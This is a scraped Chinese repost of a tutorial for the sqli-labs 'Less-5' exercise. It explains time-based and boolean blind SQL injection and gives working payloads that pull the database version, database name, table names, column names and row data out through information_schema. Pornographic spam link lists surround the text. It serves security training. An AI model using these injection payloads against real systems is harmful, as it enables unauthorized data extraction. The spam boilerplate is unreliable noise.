日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Less-5

發(fā)布時間:2025/7/14 编程问答 38 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Less-5 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

第5關,這關設計到的東西是盲注,不知道小伙伴們有沒有聽過,我們先來看一下這也頁面。

沒有打印出賬號密碼,只打印了是否存在。盲注的意思是用一個邏輯來判斷是否存在某個庫或表或字段。盲注又分了3種:1、基于時間的盲注。 2、基于布爾的盲注。 3、基于報錯的盲注。我來列舉兩種。

時間注入:

select * from users where id =1 and 1=(if(substr(database(),1,1)='t',1,sleep(2)));

這句話的意思是,查詢id=1來著users表里所以的內容,并且當數據庫的第一個字母為t是會返回1,前面的1=1就成立了,也就查詢成功。如果不是t,那么就會停止兩秒。

可以看到左下見的等待響應,這說明了當前數據庫的第一個字符不為t。這樣我們又可以進行注入了。哈哈哈

布爾盲注:

這個其實也和時間盲注差不多,我覺得比時間盲注更好一些。

select * from users where id =1 and 1=(if(substr(database(),1,1)='t',1,0));

語句差不多,主要還是看自己的用途來構造,我也來截張圖吧

下面開始講講實例:

先看數據庫的版本,payload:  ' and 1=(if(substr(version(),1,1)=5,1,0))%23

沒報錯,說明數據庫版本大于5。我們知道數據庫版面為5,就可以利用那個默認庫information_schema了

然后我可以猜一下他的數據庫名paylaod:? ' and 1=(if(substr(database(),1,1)>'a',1,0))%23

沒報錯,說明數據庫名第一個大于a,這個時候我們就可以用2分法了,不知道大家知不知道2分法,我在這給大家稍微講一講,2分發(fā),也叫2分查找法,就比如上面的例子,大于a是沒問題的,但是我們改成m呢?

還是成立的,我們再改成z看看。

這個時候不成立了,1=0,不能構成關系式了。所以查不到東西。我們把他改成t,也就是m和z的中間那個。

不成立,照舊,改成m和t中間的那個。也就是p或q,我們先試一試p

成立,改成q或者r,先試一試q

成立,我們再試一試r

成立,只剩下r到t了,我們先試一試中間的s

無查詢結果,又小于t,我們可以把大于號改成=試一試。

ok,數據庫名字第一個為s,這就是2分法的用處,它是一種效率較高的查找方法,如果一個一個去試的話,要大概19次,我們才用了8次。

根據以上得知數據庫名為security,那我們利用此方式獲取security數據庫下的表

我們現在來獲取當前數據庫中第一個表名的第一個字 payload:  ' and 1=(if(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e',1,0))#

用2分法可以發(fā)現他的表明為emails,對了突然想起沒有給你們講怎么獲取他的長度。我們這時候要用到length

我來演示怎么獲取第一個表的長度 payload:  ' and length((select table_name from information_schema.tables where table_schema = database() limit 0,1))=6 #? ? ?還是用2分法來做。

然后我們來獲取一下他的列名 payload:  ' and 1=(select 1 from information_schema.columns where table_name = 'emails' and column_name regexp '^i' limit 0,1) %23

可以知道emails的第一個列名為i開頭的。然后慢慢試知道了他為id。我們接著來過去他id里的內容。 payload:  ' and '1'=(select id from security.emails limit 0,1)%23

我們只要把'1'里面的東西換成我們猜的東西就行了。。。

轉載于:https://www.cnblogs.com/sutdy/p/8724426.html

總結

以上是生活随笔為你收集整理的Less-5的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 五月天黄色小说 | 熟女国产精品一区二区三 | 国产成人片 | 秋霞在线观看秋 | 日韩男人的天堂 | 先锋资源一区二区 | 久久精品久久国产 | 亚洲乱码精品久久久久.. | 黄色三级小视频 | 国产精品野外户外 | 这里只有久久精品 | av天天操| 精品一区二区免费 | 日本黄色www | 91在线免费看 | 人妻熟妇又伦精品视频a | 欧美日韩一二区 | 亚洲精品国产片 | 午夜久久久久久久久久久 | 韩国美女被c | 国产夫妻性生活 | 欧美日韩高清一区二区 国产亚洲免费看 | 国模小丫大尺度啪啪人体 | 色综合天天综合 | 女子spa高潮呻吟抽搐 | 亚洲视频二 | 日韩脚交footjobhd | 亚洲熟女少妇一区二区 | 午夜h视频 | av在线片| 深夜视频在线观看免费 | 91视频网址入口 | 性欧美18一19性猛交 | 2018天天弄 | 456亚洲视频 | 亚洲色图 美腿丝袜 | 国产在线观看xxx | 艳妇乳肉亭妇荡乳av | 粗喘呻吟撞击猛烈疯狂 | 国产在线无 | 色www国产亚洲阿娇 自拍一区在线 | 久久婷婷国产麻豆91天堂 | 夫妻性生活黄色片 | 亚洲爽妇网 | 快色视频在线观看 | 在线观看亚洲视频 | 欧美日韩一区二区三区在线视频 | 一个人看的毛片 | 青青色在线视频 | 97免费在线视频 | 蜜桃精品视频在线 | 亚洲在线日韩 | 黄色肉肉视频 | 中文字幕精品亚洲 | 色婷婷婷| 一级片黑人 | 性久久久久久久久 | 国模少妇一区二区 | 免费中文字幕av | 婷婷综合 | 日日干夜 | 亚洲一区无 | 狠狠综合久久av一区二区 | 日本三级片在线观看 | 久久国产精品99久久人人澡 | 亚洲AV成人无码网站天堂久久 | 一级片视频在线观看 | 少妇性bbb搡bbb爽爽爽欧美 | 亚洲一区二区三区四区在线观看 | 国产色视频一区二区三区qq号 | 久久久久一区二区 | 亚洲一级二级三级 | 99精品一区二区三区 | 成人免费av网站 | 秘密爱大尺度做爰呻吟 | 欧洲成人在线视频 | 欧美日韩国产片 | 亚洲欧美黄色片 | 丰满少妇理论片 | 欧美xo影院 | 国产福利在线免费观看 | 住在隔壁的她动漫免费观看全集下载 | 欧美77777 | 久久久久久久伊人 | 亚洲一区二区图片 | 国产精品久久久久久久久免费相片 | 久久国产精品无码网站 | 成人在线观看你懂的 | 国产av天堂无码一区二区三区 | 18岁成年人网站 | 制服丝袜国产精品 | 欧美一级片黄色 | 午夜婷婷 | 老女人一毛片 | 国产午夜一级片 | 最新中文字幕在线观看视频 | 中文字幕乱妇无码av在线 | 伊人久久91 | 邻家有女4完整版电影观看 欧美偷拍另类 |